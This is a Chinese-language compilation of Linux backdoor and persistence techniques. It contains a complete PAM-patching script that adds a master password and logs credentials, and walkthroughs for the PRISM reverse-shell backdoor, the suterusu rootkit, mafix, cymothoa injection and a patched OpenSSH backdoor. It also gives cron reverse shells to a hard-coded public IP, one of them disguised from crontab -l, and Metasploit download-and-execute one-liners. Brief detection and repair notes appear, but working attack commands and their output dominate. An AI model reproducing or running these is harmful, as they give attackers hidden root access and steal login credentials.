[root@server120 init]# nc -vv -l -p 2345 &
[root@server120 init]# ps axu | grep 3533 | grep -v grep
root 3533 0.0 0.0 103020 792 pts/1 S 13:46 0:00 nc -vv -l -p 2345
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 3533/nc 
[root@server120 tmp]# lsof -i:2345
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nc 3533 root 3u IPv4 1753126 0t0 TCP *:dbm (LISTEN)

创建文件夹

[root@server120 tmp]# mkdir /tmp/empty
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533
mount: block device /tmp/empty is write-protected, mounting read-only
mount: cannot mount block device /tmp/empty read-only

挂不上,一想是因为前几天测试sudo提权的时候把selinux打开了

[root@server120 tmp]# getenforce 
Enforcing
[root@server120 tmp]# setenforce 0
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533

然后再看一下:ps 里已经看不到该进程,netstat 里连接仍在但 PID/Program name 一栏变成了 -,lsof -i 也查不到了。

[root@server120 tmp]# ps axu | grep 3533 | grep -v grep
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN - 
[root@server120 tmp]# lsof -i:2345
[root@server120 tmp]#

/proc/3533 的目录大小变成了4096(正常的 /proc/<pid> 目录显示大小为 0,4096 是 bind 过来的那个 ext4 目录的大小)

[root@server120 tmp]# ls -ld /proc/3533
drwxr-xr-x. 2 root root 4096 7月 21 14:02 /proc/3533

修复:

[root@server120 tmp]# umount /proc/3533

检查mount:
1)/proc/mounts

[root@server120 tmp]# cat /proc/mounts | grep 3533
/dev/mapper/vg_template1-lv_root /proc/3533 ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0

2)/proc/$$/mountinfo

[root@server120 tmp]# cat /proc/$$/mountinfo | grep 3533
29 16 253:0 /tmp/empty /proc/3533 rw,relatime - ext4 /dev/mapper/vg_template1-lv_root rw,seclabel,barrier=1,data=ordered

3)mount -l

[root@server120 tmp]# mount -l | grep 3533
/tmp/empty on /proc/3533 type none (rw,bind)

因为 mount -l 读取的是 /etc/mtab,攻击者可以直接删除该文件中的对应条目来隐藏挂载,所以使用 1) 和 2) 这两个由内核提供的视图更靠谱。

参考文章:
http://www.freebuf.com/articles/network/140535.html

自动化脚本


https://github.com/litsand/shell/blob/master/pam.sh

#!/bin/bash
## pam.sh (quoted from the reference link above): patches pam_unix.so so that a
## hard-coded password is accepted for any account and every successful
## pam_unix login is appended to a log file. Reproduced here as a sample for
## building detections; see the notes on each step for the artifacts it leaves.
##
## Check the installed PAM version:
##   RedHat:         yum list pam
##   Debian/Ubuntu:  dpkg -s libpam-modules | grep -i version | cut -d' ' -f2
##
PASS='test123' # master password; the sed patch below turns a match on it into an unconditional PAM_SUCCESS
LOG='\/bin\/.sshlog' # sed-escaped path of the file that receives "user : password" lines (detection artifact)

echo "
.___ ___. ___ ___ _______ ____ ____ 
| \/ | / _ \ / _ \ | \ \ \ / / 
| \ / | | | | | | | | | | .--. | \ \/ / 
| |\/| | | | | | | | | | | | | | \_ _/ 
| | | | | |_| | | |_| | | '--' | | | 
|__| |__| \___/ \___/ |_______/ |__| "
echo -e "\nPam-Backdoor\n{code this shit while learning pam}\n\n"
# %z is the ctime of an untouched sibling module; it is reused by the touch -d
# near the end to back-date the replacement. touch can only rewrite atime/mtime,
# so the real ctime of the swapped file still reflects the swap.
oldtime=`stat -c '%z' /lib/security/pam_ftp.so`
echo 'Pam backdoor starting!'
# Upstream Linux-PAM 1.1.1 tarball: the patched module is built from this source
# rather than from the distro package, so its hash will not match rpm -V pam.
mirror_url='http://www.linux-pam.org/library/Linux-PAM-1.1.1.tar.gz'
#mirror_url='http://yum.singlehop.com/pub/linux/libs/pam/pre/library/Linux-PAM-0.99.6.2.tar.gz'
echo 'Fetching from '$mirror_url
wget $mirror_url #fetch the roll
tar zxf Linux-PAM-1.1.1.tar.gz #untar
cd Linux-PAM-1.1.1
# Find and replace in pam_unix_auth.c: right after the real password check,
# (1) a match on $PASS forces retval = PAM_SUCCESS, and (2) on any PAM_SUCCESS
# "name : p" is appended to $LOG. $PASS and $LOG are spliced into the sed
# program unquoted.
sed -i -e 's/retval = _unix_verify_password(pamh, name, p, ctrl);/retval = _unix_verify_password(pamh, name, p, ctrl);\n\tif (strcmp(p,"'$PASS'")==0 ){retval = PAM_SUCCESS;}if(retval == PAM_SUCCESS){\n\tFILE * fp;\n\tfp = fopen("'$LOG'", "a");\n\tfprintf(fp, "%s : %s\\n", name, p);\n\tfclose(fp);\n\t}/g' modules/pam_unix/pam_unix_auth.c
# First word of /etc/issue selects the distro; CentOS is built without SELinux support.
DIS=`head /etc/issue -n 1|awk '{print $1}'`
#get the version
if [ $DIS = "CentOS" ];then
./configure --disable-selinux && make
else
./configure && make
fi
# Copy the modified pam_unix.so over the system module. The library directory is
# chosen from uname -p; the original is left next to the new file as
# pam_unix.so.bak, which is another artifact to look for.
if [ `uname -p` = 'x86_64' ];then
LIBPATH=lib64
else
LIBPATH=lib
fi
/bin/cp -rf /$LIBPATH/security/pam_unix.so /$LIBPATH/security/pam_unix.so.bak # keep the original as .bak
/bin/cp -rf modules/pam_unix/.libs/pam_unix.so /$LIBPATH/security/pam_unix.so
# Back-date mtime to the value read from pam_ftp.so. Note the hard-coded /lib
# path: on x86_64 the file actually replaced is /lib64/security/pam_unix.so,
# whose mtime is therefore left fresh.
touch -d "$oldtime" /lib/security/pam_unix.so
# Remove the source tree and the downloaded tarball from the working directory.
cd .. && rm -rf Linux-PAM-1.1.1*
echo "Done bro.."

然后只要有用户登录成功,账号和密码便会被记录到上面 LOG 指定的文件中

[root@server120 ~]# cat /bin/.sshlog 
root : test123

排查方式


1.通过Strace跟踪ssh

[root@server120 tmp]# ps axu | grep sshd
root 7262 0.0 0.0 66604 1232 ? Ss 2016 0:01 /usr/sbin/sshd
[root@server120 tmp]# strace -o aa -ff -p 7262
[root@server120 tmp]# grep open aa* | grep -v -e No -e null -e denied| grep WR
aa.26246:open("/bin/.sshlog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 7

2.检查pam_unix.so的mtime和ctime(注意上面的脚本最后用 touch -d 把 mtime 改回了旧值,而 ctime 无法用 touch 伪造;另外可以用 rpm -V pam 校验文件哈希是否与安装包一致)
32位:

[root@server120 tmp]# stat /lib/security/pam_unix.so

64位:

[root@server120 tmp]# stat /lib64/security/pam_unix.so

修复方案


yum reinstall pam

参考文章


http://www.freebuf.com/articles/system/24104.html

支持平台

Linux

Solaris

AIX

BSD/Mac

Android

 

功能

支持两种模式:ICMP和STATIC

进程名自定义

没有监听端口

支持清空iptables配置

pure C开发

没有依赖库

 

项目地址

git clone https://github.com/andreafabrizi/prism.git

 

编译

gcc <..OPTIONS..> -Wall -s -o prism prism.c

 

选项如下:

-DDETACH #后台运行

-DSTATIC #开启STATIC模式 (默认ICMP模式)

-DNORENAME #不使用自定义的进程名

-DIPTABLES #清空所有的iptables规则

 

ICMP模式

使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包,通过私有密钥可以阻止第三方访问。后门进程接受ping包激活。

 

可以修改密钥,默认是p4ssw0rd

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       icmp

 Key:                           p4ssw0rd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

可以看到模式为icmp

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

攻击机(172.16.100.182):

./sendPacket.py 172.16.100.134 p4ssw0rd 172.16.100.182 6666

发送icmp包

内容如下:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

然后获得Shell。

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

STATIC模式

后门尝试连接硬编码的IP:PORT

 

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"

可以看到自定义进程名称为udevd

重新编译

gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c


[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       static

 Host:                         172.16.100.182

 Port:                          6666

 Respawn Delay:              15 sec

 Process name:                 udevd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

查看进程

[root@vincent prism-master]# ps axu | grep udev | grep -v grep

root      14474  0.0  0.0   3924   144 pts/1    S    17:26   0:00 udevd

获得Shell

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:

Get root
$ ./sock 0
Hide PID
$ ./sock 1 [pid]
Unhide PID
$ ./sock 2 [pid]
Hide TCPv4 port
$ ./sock 3 [port]
Unhide TCPv4 port
$ ./sock 4 [port]
Hide TCPv6 port
$ ./sock 5 [port]
Unhide TCPv6 port
$ ./sock 6 [port]
Hide UDPv4 port
$ ./sock 7 [port]
Unhide UDPv4 port
$ ./sock 8 [port]
Hide UDPv6 port
$ ./sock 9 [port]
Unhide UDPv6 port
$ ./sock 10 [port]
Hide file/directory
$ ./sock 11 [name]
Unhide file/directory
$ ./sock 12 [name]

在CentOS6.5 64位下测试:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c: 在函数‘main’中:
sock.c:205: 警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220: 警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

隐藏进程:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542

隐藏文件:
注意:文件隐藏只按文件名匹配,例如隐藏文件 x 时,所有目录下名为 x 的文件都会被隐藏

[root@vincent suterusu-master]# ./sock 11image.php
Hiding file/dir ../image.php

隐藏连接:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 0 0 0.0.0.0:49745 0.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#

测试机器:
CentOS5.5 32位和64位系统测试成功

[root@localhost mafix]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
[root@localhost tmp]# tar zxvf mafix.tar.gz
mafix/
mafix/mafixlibs
mafix/mafix
mafix/root
mafix/HOW-TO
[root@localhost tmp]# cd mafix
[root@localhost mafix]# ls
HOW-TO mafix mafixlibs root
[root@localhost mafix]# ./root hehe123 2345 //其中hehe123为密码 2345为后门端口

123

[root@localhost mafix]# netstat -anlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 15690/ttyload
[root@localhost mafix]# ps axu | grep 15690 | grep -v grep
root 15690 0.0 0.0 2280 508 ? Ss 22:20 0:00 /sbin/ttyload -q
[root@localhost mafix]# ll /proc/15690/exe
lrwxrwxrwx 1 root root 0 Jun 8 22:22 /proc/15690/exe -> /tmp/sh-AIN2LD3APKJ (deleted)

登录后门:

[root@vincent tmp]# ssh 172.16.100.154 -p 2345
root@maf!x:/root$ whoami
root

下载:https://sourceforge.net/projects/cymothoa/files/
测试环境:
32位环境下可以编译成功

[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux

64位环境下编译报错
后门可以注入到任何有权限操作的进程,反弹回来的 shell 也就是该进程的权限;该进程重启或挂掉后,后门也随之消失

[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]# ps axu | grep httpd | grep root | grep -v grep 
root 14988 0.0 0.2 10068 2900 ? Ss 05:38 0:00 /usr/sbin/httpd
[root@localhost cymothoa-1-alpha]# ./cymothoa -p 14988 -s 0 -y 8888 //14988为要注入进程的进程号
[+] attaching to process 14988

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffdfe ebx value: 0x0
 esp value: 0xbfd121bc eip value: 0x6ed402
 ------------------------------------------------------------

[+] new esp: 0xbfd121b8
[+] injecting code into 0x00d27000
[+] copy general purpose registers
[+] detaching from 14988

[+] infected!!!

比如注入到httpd进程中,然后nc连接

[root@localhost cymothoa-1-alpha]# netstat -antlp | grep 8888
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 15036/httpd 
root@kali-vincent:~# nc -vv 172.16.100.156 8888
172.16.100.156: inverse host lookup failed: Unknown host
(UNKNOWN) [172.16.100.156] 8888 (?) open
whoami
root

安装步骤:

http://core.ipsecs.com/rootkit/patch-to-hack/0×06-openssh-5.9p1.patch.tar.gz
http://ftp.eu.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
安装前首先
ssh -V
[root@vincent tmp]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
记录下原来ssh版本信息,免得安装后一看就版本不一样了

tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后门

vi includes.h //修改后门密码,记录文件位置,

/*
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321" //你后门的密码
*/

vi version.h //修改SSH_VERSION,改成原来的OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

 

123

先安装所需环境不然会报错

yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log
需要安装zlib
yum install -y zlib zlib-devel
make && make install
service sshd restart //重启sshd
然后我们登录 ssh 验证一下:使用后门密码登录时,不会留下该次登录的记录。

修复方案:
1)重装openssh软件
2)SSH禁止对外开放

应急响应:
1)比对ssh的版本
ssh -V
2)查看ssh配置文件和/usr/sbin/sshd的时间(stat 输出里同时看 Modify 和 Change 两个时间:mtime 可被 touch 伪造,ctime 不能;还可以用 rpm -V openssh-server 校验文件哈希)
stat /usr/sbin/sshd
3)strings检查/usr/sbin/sshd,看是否有邮箱信息
strings可以查看二进制文件中的字符串,在应急响应中是十分有用的。有些sshd后门会通过邮件发送登录信息,通过strings /usr/sbin/sshd可以查看到邮箱信息。
4)通过strace监控sshd进程读写文件的操作
一般的sshd后门都会将账户密码记录到文件,可以用 strace 跟踪 sshd 进程的文件写操作,从而定位到记录密码的文件。

ps axu | grep sshd | grep -v grep
root 65530 0.0 0.1 48428 1260 ? Ss 13:43 0:00 /usr/sbin/sshd
strace -o aa -ff -p 65530
grep open aa* | grep -v -e No -e null -e denied| grep WR
aa.102586:open("/tmp/ilog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 4

下载地址:

http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz

需要注意两点:

1.) ISHELL uses raw sockets on both the client and server side, therefore root privileges ARE REQUIRED to use this program.

客户端和服务端都使用 raw socket 通信,因此两端都需要 root 权限

2.) When configuring the options for the server/client make sure the following options are the same on both the client and the server:

 

[root@server120 ISHELL-v0.2]# make linux

参数如下:

[root@server120 ISHELL-v0.2]# ./ishd -h

ICMP Shell v0.2  (server)   -   by: Peter Kieltyka

usage: ./ishd [options]



options:

 -h               Display this screen

 -d               Run server in debug mode

 -i <id>          Set session id; range: 0-65535 (default: 1515)

 -t <type>        Set ICMP type (default: 0)

 -p <packetsize>  Set packet size (default: 512)

被控端:

[root@server120 ISHELL-v0.2]# ./ishd -i 65535 -t 0 -p 1024 -d

-----+ IN DATA +------

id

-----+ OUT DATA +-----

uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

控制端:

[root@vincenthostname ISHELL-v0.2]# ./ish -i 65535 -t 0 -p 1024 172.16.100.134

 

 

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i')|crontab -

升级猥琐版

(crontab -l;printf "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

crontab -l 直接提示 no crontab for $username(\r 只是在终端显示时把前面的任务内容盖掉了;排查时应直接 cat -A /var/spool/cron/<用户名> 查看原始内容,或用 crontab -l | cat -A)
[root@vincenthostname bin]# crontab -l
no crontab for root
反弹成功
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

转自:http://zone.wooyun.org/content/18244

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671